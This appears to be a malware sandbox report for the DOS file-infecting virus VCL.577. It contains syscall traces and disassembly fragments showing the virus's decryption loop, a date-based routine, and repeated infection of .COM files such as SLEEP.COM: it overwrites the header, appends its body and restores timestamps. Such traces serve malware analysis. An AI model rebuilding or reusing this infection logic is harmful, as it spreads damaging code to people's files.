Sample viewer

vx.netlux.org/Virus.DOS.VCL.577

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:13.453557665Z 44 PC: 12ae9 | Get time
0x12ae9: cmp dh, 0x2d
0x12aec: ja 0x12aff
0x12aee: mov di, 0x100
0x12af1: lea si, word ptr [bp + 0x163]
0x12af5: mov cx, 3
0x12af8: rep movsb byte ptr es:[di], byte ptr [si]
0x12afa: mov di, 0x100
0x12afd: jmp di
0x12aff: lea si, word ptr [bp + 0x166]
0x12b03: mov di, si
0x12b05: mov cx, 0x1de
0x12b08: shr cx, 1
0x12b0a: call 0x12b10
0x12b0d: jmp 0x12b40
0x12b10: lodsw ax, word ptr [si]
0x12b11: not al
0x12b13: dec al
0x12b15: dec al
0x12b17: xchg al, ah
0x12b19: add ah, 2

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11482,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.086480516Z 44 PC: 12ae9 | Get time
0x12ae9: cmp dh, 0x2d
0x12aec: ja 0x12aff
0x12aee: mov di, 0x100
0x12af1: lea si, word ptr [bp + 0x163]
0x12af5: mov cx, 3
0x12af8: rep movsb byte ptr es:[di], byte ptr [si]
0x12afa: mov di, 0x100
0x12afd: jmp di
0x12aff: lea si, word ptr [bp + 0x166]
0x12b03: mov di, si
0x12b05: mov cx, 0x1de
0x12b08: shr cx, 1
0x12b0a: call 0x12b10
0x12b0d: jmp 0x12b40
0x12b10: lodsw ax, word ptr [si]
0x12b11: not al
0x12b13: dec al
0x12b15: dec al
0x12b17: xchg al, ah
0x12b19: add ah, 2

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":46,"TimeBased":true,"OriginalID":11482,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:49.141504615Z 44 PC: 12ae9 | Get time
0x12ae9: cmp dh, 0x2d
0x12aec: ja 0x12aff
0x12aee: mov di, 0x100
0x12af1: lea si, word ptr [bp + 0x163]
0x12af5: mov cx, 3
0x12af8: rep movsb byte ptr es:[di], byte ptr [si]
0x12afa: mov di, 0x100
0x12afd: jmp di
0x12aff: lea si, word ptr [bp + 0x166]
0x12b03: mov di, si
0x12b05: mov cx, 0x1de
0x12b08: shr cx, 1
0x12b0a: call 0x12b10
0x12b0d: jmp 0x12b40
0x12b10: lodsw ax, word ptr [si]
0x12b11: not al
0x12b13: dec al
0x12b15: dec al
0x12b17: xchg al, ah
0x12b19: add ah, 2
2018-12-25T12:30:49.144481713Z 78 PC: 12b54 | Find first file
2018-12-25T12:30:49.150797175Z 67 PC: 12b6c | Get or set file attributes
2018-12-25T12:30:49.156529783Z 67 PC: 12b7a | Get or set file attributes
2018-12-25T12:30:49.181533981Z 61 PC: 12b82 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:49.18859972Z 87 PC: 12b88 | Get or set file date and time
2018-12-25T12:30:49.189815966Z 63 PC: 12b95 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:30:49.196970031Z 66 PC: 12bb4 | Move file pointer
2018-12-25T12:30:49.202333336Z 64 PC: 12bbf | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:30:49.205384368Z 66 PC: 12bc8 | Move file pointer
2018-12-25T12:30:49.207210737Z 42 PC: 12c11 | Get date
0x12c11: cmp al, 0
0x12c13: je 0x12c53
0x12c15: cmp al, 1
0x12c17: je 0x12c30
0x12c19: cmp al, 2
0x12c1b: je 0x12c37
0x12c1d: cmp al, 3
0x12c1f: je 0x12c3e
0x12c21: cmp al, 4
0x12c23: je 0x12c45
0x12c25: cmp al, 5
0x12c27: je 0x12c4c
0x12c29: mov word ptr [bp + 0x15d], 0x494c
0x12c2f: ret
0x12c30: mov word ptr [bp + 0x15d], 0x4f56
0x12c36: ret
0x12c37: mov word ptr [bp + 0x15d], 0x454c
0x12c3d: ret
0x12c3e: mov word ptr [bp + 0x15d], 0x4953
0x12c44: ret
2018-12-25T12:30:49.210642585Z 64 PC: 12bd6 | Write file or device (Write 99 bytes on handle 5)
2018-12-25T12:30:49.213856962Z 64 PC: 12bf1 | Write file or device (Write 478 bytes on handle 5)
2018-12-25T12:30:49.226078663Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:30:49.228140857Z 62 PC: 12bfc | Close file
2018-12-25T12:30:49.25086905Z 67 PC: 12c08 | Get or set file attributes
2018-12-25T12:30:49.260938414Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.264336764Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.269752324Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.27937897Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.28703781Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.288343128Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.294599287Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.296422914Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.298967243Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.300106552Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.303365652Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.306822391Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.314852343Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.317173088Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.324954532Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.334842871Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.338396481Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.344235243Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.35442771Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.367440292Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.36908556Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.375640596Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.377148377Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.37985919Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.381261054Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.383352292Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.386277434Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.394502426Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.395835817Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.403424961Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.412969975Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.415427884Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.421877535Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.431958043Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.43843756Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.443457624Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.450108484Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.451337178Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.455652669Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.456912909Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.45888079Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.46240935Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.478387126Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.480185868Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.488921142Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.498410387Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.500902084Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.506552276Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.51736795Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.523901502Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.525481763Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.532645813Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.534230761Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.537019937Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.539462028Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.541784702Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.5447662Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.553936533Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.555662935Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.563347231Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.574026298Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.577991904Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.583715699Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.594229588Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.600671848Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.602287692Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.60922864Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.610707159Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.613515902Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.615951126Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.618328436Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.628857893Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.638616747Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.640850777Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.649580529Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.66025955Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.663504969Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.669360614Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.679360961Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.686813951Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.688525525Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.6951108Z 66 PC: 12bb4 | Move file pointer (See above)
2018-12-25T12:30:49.697679429Z 64 PC: 12bbf | Write file or device (See above)
2018-12-25T12:30:49.700505653Z 66 PC: 12bc8 | Move file pointer (See above)
2018-12-25T12:30:49.702127605Z 42 PC: 12c11 | Get date (See above)
2018-12-25T12:30:49.705157365Z 64 PC: 12bd6 | Write file or device (See above)
2018-12-25T12:30:49.708663009Z 64 PC: 12bf1 | Write file or device (See above)
2018-12-25T12:30:49.716908245Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.725612272Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.733532587Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.743033896Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.745936235Z 67 PC: 12b6c | Get or set file attributes (See above)
2018-12-25T12:30:49.751913686Z 67 PC: 12b7a | Get or set file attributes (See above)
2018-12-25T12:30:49.761317247Z 61 PC: 12b82 | Open file (See above)
2018-12-25T12:30:49.773494469Z 87 PC: 12b88 | Get or set file date and time (See above)
2018-12-25T12:30:49.774893327Z 63 PC: 12b95 | Read file or device (See above)
2018-12-25T12:30:49.781186694Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:30:49.783085157Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:30:49.789982265Z 67 PC: 12c08 | Get or set file attributes (See above)
2018-12-25T12:30:49.799629638Z 79 PC: 12b54 | Find next file (See above)
2018-12-25T12:30:49.80295157Z 59 PC: 12b5e | Change current directory